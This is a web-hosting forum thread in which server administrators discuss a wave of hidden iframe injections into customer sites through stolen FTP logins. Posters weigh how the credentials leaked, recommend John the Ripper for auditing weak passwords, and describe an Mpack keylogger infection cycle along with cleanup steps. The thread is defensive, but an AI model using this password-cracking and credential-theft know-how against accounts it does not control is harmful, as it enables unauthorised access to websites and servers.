LinkBack URL
About LinkBacksI have an account at Hostgator and clearly know that iframe issue was IN SEPTEMBER.
Now getting back to the topic... It is not difficult to steal FTP logins as they are sent unencrypted. I can say very rare uses secure FTP.
I have an account at Hostgator and clearly know that iframe issue was IN SEPTEMBER.
Now getting back to the topic... It is not difficult to steal FTP logins as they are sent unencrypted. I can say very rare uses secure FTP.
I don’t think the passwords are being captured by anyone listening on the server or between the server + user or even on the users system. It’s more likely they gained the passwd file off the server and ran something like jack the ripper to crack the passwords.
We've seen the same IP on all of our servers that are affected connect to the server with many different usernames and login successfully. We're currently investigating if it’s feasible to simply download the passwd file off the server with some PHP coding and then attempt to crack the passwords.
On most modern linux distros passwords are not stored in //etc/passwd, they're in /etc/shadow and to get at those you nearly always need a root exploit (unless your permissions on that file are FUBAR'd). I'd guess at a simple password guesser/weak password.
Usually to capture passwords in the clear requires, again, either a root exploit on the server itself, or a packet sniffer on the same subnet as you on a seperate server that has been root comrpomised. It's unlikely, but possible.
Jonathan Michaelson
Need your cPanel servers secured and tuned?
cPanel Server Configuration, Security, Recovery and Antivirus/AntiSpam Services
Developers of the most effective (and free) Firewall & Security Solution for cPanel Servers - csf
http://www.configserver.com
On one server with 850 accounts, we believe 63 have been accessed and affected by this code change.
So yes, it could be that all the users were using relatively weak passwords and they were guessed, along with the usernames ... or someone has been able to gain other sensetive information, as you suggest. But there is nothing sniffing on our network or the individual servers to do this. So it means cPanel has a problem or something else gathered information before cPanel patched it.
Get John the ripper to test your users passwords.
Last edited by carluk; 12-06-2006 at 04:41 AM. Reason: Wrong name.
search is your friend!
cPanel Specialist Certification::Technical
lol.. u mean John-the-ripper..
on one of my other cracked server I got a nice 44 meg password list.. boy does it crack em good
Good catch. I should probably just use JTRI should have included link: http://www.openwall.com/john/ also worth reading http://en.wikipedia.org/wiki/John_the_Ripper
search is your friend!
cPanel Specialist Certification::Technical
Originally Posted by JamesSmith
Exactly I pay for server management I dont need them to do it. If its an insecurity then its something they should automatically help with specially since its a paid for Script........
PS I have had to also pay additional fees on top of my management because of these problems I'm not a happy camper
Last edited by shanit; 05-09-2007 at 08:18 PM.
This happend to several accounts in one of my server. I don't see any root access or any such problem. Some one from IP: 81.95.144.202 login to FTP of several web sites and downloaded index file, added his code and reuploded it.
There's an ongoing discussion about iFrame hacks at: http://forums.cpanel.net/showthread....ghlight=iFrame
Solution to IFRAME and JAVA SCRIPT HACK
How does this hacking takes place:
This hacking does not takes place by any PHP application vulnerability nor any kernel bug nor apache bug nor cpanel or Plesk bug. Those accounts files are affected whose FTP logins are leaked.
Beleive me, I am reasearching behind this iframe and java script hack from last 10 months.
ONLY THOSE ACCOUNTS ARE HACKED WHOSE FTP LOGIN DETAILS ARE LEAKED AND ARE WITH HACKER !!!!
How it's done
This is a sophisticated operation, and the infection cycle is involved, but basically, the hacker(s) are setting up innocent looking sites (or using previously hacked sites where the owner is usually unaware of being compromised) and loading them with expensive hacking tools like Mpack. When someone visits that site, their browser is detected and attacked (browsers affected are IE, firefox and opera). The visitor is unaware that they may have a keylogger that sends the persons passwords ect to the hacker(s) and moves on. If the innocent visitor has an ftp or root password for any internet sites, the hackers use a program that goes to the persons site(s) and instantly adds the hidden iframe to every index type page. This is why there seems to be no indication that the site has been compromised, as the hackers already have the ftp or root passwords to login. And since they have at least your account ftp pass, whatever permissions your folders and files are set to make no difference.
After they put the iframe code into that person's pages, anyone visiting that site will be redirected to the hackers infection site, where the person's computer will be injected and infected. The hackers are depending on site owners not knowing their sites have been hacked so that the number of hacked sites will grow (as they have starting in Italy) into the tens of thousands... Please don't think you can depend solely on your antivirus software to protect your computer. It more than likely won't help you. For $1000 dollars, the russian hacking bulletin boards are offering Mpack with 1 year support and a GUARANTEE that virus programs will not catch the keyloggers. SO, keep your virus program updated, but don't depend on it completely!
This way this hack is spreading fastly from one computer to another broadcasting the passwords to hackers.During my research in this, I even found some of the password files collected by the hack on some of the hacked server, where they pass this password file to thier tool to add the code. In some cases Google bots picks this files and you can even find the login details of FTP accounts and Server root login details in google.
===============================================
Solution:
===============================================
For Server Administrators:
If you are having this problem server wide then the only possibility is your root password is used for this. Just change the password and this HACK WILL STOP
For individual person owning just a domain and not server:
If you are facing this problem and your administrator says its only your account, just change the FTP password and it will stop
You must have removed the code many times and it comes again, why ???
As you dont change the FTP password. So change that first.
Just changing password is not complete solution but is the first step.
Whats next, your password is leaked that means your computer is sending out the passwords, so I would suggest you to do a clean format first and then install any antivirus of spyware which you think could block it. But the best solution is to clean format the computer.
Just do the two things:
1) Change the FTP or root password of server
2) Clean format the PC
and take care in future, you dont visit any lof the virsu links made by this hack.
Also to keep your password secure I would suggest you to use any password manager software like:
http://keepass.info/
This is a FREE OpenSource Software
I can assure you this is confirmed solution and will definitely help you all.
Please try it and also when you are confirmed, please spread this message in as many forums as you can so that others also come to know how to stop it.
Comments can be sent to: tech.cpanel@gmail.com
@ apscinsspl
Thanks for the solution, I am going to give it a try and hope it works.
Reply With Quote
